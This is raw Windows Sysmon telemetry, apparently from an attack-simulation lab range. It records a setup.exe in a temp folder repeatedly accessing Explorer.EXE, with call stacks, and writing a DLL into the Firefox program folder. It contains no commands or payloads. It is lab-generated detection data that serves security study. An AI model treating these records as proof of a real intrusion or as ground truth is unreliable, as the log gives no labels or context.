13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\mozavutil.dll2021-01-18 13:59:52.427 10341000x800000000000000015079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 